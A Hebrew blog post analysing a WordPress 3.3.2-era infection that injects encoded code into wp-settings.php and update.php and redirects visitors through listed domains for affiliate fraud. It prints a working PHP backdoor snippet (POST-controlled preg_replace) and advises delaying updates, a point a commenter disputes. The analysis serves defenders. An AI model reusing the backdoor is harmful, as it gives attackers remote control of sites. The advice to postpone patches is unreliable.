פריצה חדשה בעדכון אוטומטי של וורדפרס 3.3.2

מבוא:

מיתוס הנפוץ ביותר אצל רוב בעלי אתרים על בסיס וורדפרס שממשק ותוספים מעודכנים משפר את אבטחת האתר. לכן רובם עושים את העדכונים בעזרת ממשק באופן אוטומטי (לוח בקרה – שדרוגים). במקרה של שדרוג אוטומטי לגרסה האחרונה (3.3.2) שיצאה לפני זמן קצר קיים חשש לפריצה.
למרבה הצער, עדכון מעדכן קבצי ממשק, ולא מוחק את הקבצים שכוללים קוד זדוני או קבצים נגועים בצורה כזאת או אחר. לכן חשוב מאוד לנקות את הקבצים השונים לפני עדכון.
תשתית לפריצה נוצרה ,בערך ב 20 לאפריל, לפני שגרסה האחרונה שוחררה. פריצה למעשה ממתינה לביצוע עדכון אוטומטי.

איך זה קורה?

המתקפה על הבלוג מתבצעת ע"י הזנת קוד מקודד base64 לתוך קובץ wp-settings.php (שיושב בתקיה ראשית של וורדרס). פיצוח של קוד.


// For an advanced caching plugin to use. Uses a static drop-in because you would only want one.
// Start cache settings
eval(base64_decode('...קוד ארוך...'));
// Finish cache settings
// Start cache settings
// Finish cache settings

הקוד  מאוד מתוכם ומשתמש בcookie כדאי ליצור הפניה. לאחר שהפניה מתבצעת נשלח IP של הגולש לשרת מרוחק, שבו כתובת IP נחסמת. במטרה לחסום הפניה לגולשים חוזרים.  חסימת כתובת IP ושמירה cookie בתוך הדפדפן של גולש חוסם אפשרות זיהוי פריצה.


if (isset($_REQUEST['cadv']) && isset($_REQUEST['gadv'])) {
$c = $_POST['cadv'];
$c = str_replace("\\\\", "\\", $c);
$g = $_POST['gadv'];
$g = str_replace("\\\"", "\"", $g);
$r = preg_replace("$c", $g, 'sss 4');
die();
}

פרט מאוד מעניין בתוך הקוד היא אפשרות שליטה מרחוק בתוך הקוד עצמו.

 

בנוסף לקוד בתוך wp-settings.php, מתבצע שינוי של פונקציה wp_update_core בתוך קובץ update.php שיושב בתוך תיקיה wp-admin/includes. למעשה הפונקציה הזאת אחראית על עדכון אוטומטי של וורדפרס. פיצוח הקוד.

איך זה עובד?

גולשים מופנים לקישורים הבאים:

berega .in/?site=<site id>&q=<search query>&searchEngine=<engine id>
zizigoba .in/?site=<site id>&q=<search query>&searchEngine=<engine id>
vivizaza .be/?site=<site id>8&q=<search query>&searchEngine=<engine id>

ולאחר מכן לכתובת הללו:

riotorio .com/search/?q=<search query>
lazgosearch .com/search?_t=1&q=<search query>
gabazasearch .com/?_t=1&q=<search query>

כתוצאה מזה ממרים את הטראפיק בתוכניות שותפים לכסף.

המלצות:

  1. כדאי לבדוק מדי פעם את תאריך עדכון של הקבצים.
  2. כדאי לבדוק את הקבצים לפני ביצוע שדרוג.
  3. לא להסתמך על המיתוס "גרסה הכי חדשה מפחיתה אפשרויות פריצה"
  4. לחכות פרק זמן של שבועיים – חודש לפני עדכון לגרסה הכי אחרונה
  5. כדאי לבצע שדרוג ידני ולא אוטומטי, ז"א לעלות אך ורק דרך FTP.

סיכום:

האקרים כבר מזמן עלו מדרגה ומתקפות שלהם כבר לא מסתיימות רק בלגרום נזק, אלה גם להפיק תועלת משעננות של משתמשים רגילים.

תודה ענקית לDenis Sinegubko מחברת Unmask Parasites.

3 תגובות

  1. סיקור מעניין של חורי האבטחה בגירסאות האחרונות של וורדפרס. באמת מעניין..
    תודה אלכס!

  2. גרסאות חדשות של וורדפרס בטוחות יותר ומונעות פרצות, וכן – כדאי וחשוב לעדכן בכל גרסה חדשה.
    יחד עם זאת מה שכתבת כאן הוא נכון:

    מרבה הצער, עדכון מעדכן קבצי ממשק, ולא מוחק את הקבצים שכוללים קוד זדוני או קבצים נגועים בצורה כזאת או אחר. לכן חשוב מאוד לנקות את הקבצים השונים לפני עדכון.

    זה לא מונע את העובדה שצריך לעדכן את וורדפרס. כנראה שאם האתר שלך כבר פרוץ העדכון לא יעזור, אבל עדיין.

    • אתה צודק ב100%, לעדכן ממשק זה תמיד חשוב. אבל בכל זאת, אני חושב שכדאי לעדכן את הממשק כמה שבועות לאחר שיחרור גרסה חדשה.
      יחד עם זאת, אם יש לך קוד זדוני בתוך קובץ עדכון, אז עדכון גורם לנזק רציני יותר, במקרה כזה עדיף להישאר עם גרסה ישנה יותר.

      בכל מקרה, למדתי על בסיס ניסיון אישי, עדיף להקדיש 10-20 דקות לבדוק את תאריך אחרון של עדכון קבצים ולבצע עדכון ידני (דרך FTP).